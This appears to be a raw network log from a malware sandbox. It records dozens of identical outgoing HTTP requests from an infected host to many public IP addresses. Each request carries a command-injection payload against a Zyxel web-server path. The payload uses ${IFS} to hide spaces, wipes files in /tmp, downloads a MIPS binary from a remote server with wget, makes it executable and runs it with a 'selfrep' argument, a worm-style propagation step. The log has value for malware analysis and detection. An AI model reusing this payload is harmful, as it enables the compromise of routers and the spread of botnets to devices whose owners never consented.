                                            Jan 14, 2024 15:50:44.511123896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5713192.168.2.2343668132.167.74.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511154890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5714192.168.2.2333222130.61.14.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511178017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5715192.168.2.233997417.69.254.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511217117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5716192.168.2.235007895.78.83.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511264086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5717192.168.2.236025687.197.68.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511298895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5718192.168.2.233323635.126.87.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511326075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5719192.168.2.2343178173.139.148.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511336088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5720192.168.2.2348788184.202.56.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511384010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5721192.168.2.2343678156.184.212.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511425972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5722192.168.2.2346282191.142.55.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511444092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5723192.168.2.2343630143.53.202.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511456013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5724192.168.2.234788093.132.53.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511493921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5725192.168.2.234950875.225.245.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511550903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5726192.168.2.2342990102.254.27.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511559963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5727192.168.2.2335954200.65.19.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511600971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5728192.168.2.235311459.87.190.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511631966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5729192.168.2.235074497.139.94.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511641026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5730192.168.2.234829291.150.113.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511657000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5731192.168.2.235923214.48.238.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511686087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5732192.168.2.2334294136.244.97.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511729956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5733192.168.2.2345894183.184.84.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511730909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5734192.168.2.233623234.113.235.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511811972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5735192.168.2.2336902163.237.89.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511827946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5736192.168.2.2340046120.40.39.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511843920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5737192.168.2.2354820180.146.171.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511881113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5738192.168.2.233916486.184.125.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511934996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5739192.168.2.2348750170.130.241.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511955023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5740192.168.2.2340902123.86.0.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511982918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5741192.168.2.2336706209.154.84.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512013912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5742192.168.2.2340962173.32.66.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512065887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5743192.168.2.2337816139.192.223.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512075901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5744192.168.2.234058871.243.108.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512115955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5745192.168.2.2348158223.111.198.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512146950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5746192.168.2.235258231.193.138.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512151003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5747192.168.2.235118869.90.81.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512193918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5748192.168.2.2353482109.1.50.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512212038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5749192.168.2.235241260.5.230.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512263060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5750192.168.2.235633018.77.17.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512309074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5751192.168.2.23389129.123.143.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512310982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5752192.168.2.2351562130.97.9.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512331963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5753192.168.2.235055876.125.41.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512343884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5754192.168.2.2352778117.137.200.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512373924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5755192.168.2.235590076.161.241.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512428045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5756192.168.2.235176232.136.199.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512459040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5757192.168.2.2352894152.248.98.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512486935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5758192.168.2.233957463.125.69.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512517929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5759192.168.2.2341304201.10.195.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512542963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5760192.168.2.235018244.156.10.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512583017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5761192.168.2.2335802204.46.236.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512609959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5762192.168.2.2344114172.145.136.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512638092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5763192.168.2.2338618219.90.165.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512685061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5764192.168.2.234317454.249.247.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512717962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5765192.168.2.2360966179.251.242.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512728930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5766192.168.2.2350144117.95.32.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512763023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5767192.168.2.2360042118.249.139.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512804031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5768192.168.2.235945464.147.145.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512823105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5769192.168.2.2345944199.97.215.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512868881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5770192.168.2.234046013.142.174.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512886047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5771192.168.2.2356060143.100.134.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512903929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5772192.168.2.235397439.221.20.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512955904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5773192.168.2.234189027.13.111.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512970924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5774192.168.2.2358442123.83.146.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.512986898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5775192.168.2.2358620124.73.5.242443
                                            TimestampBytes transferredDirectionData
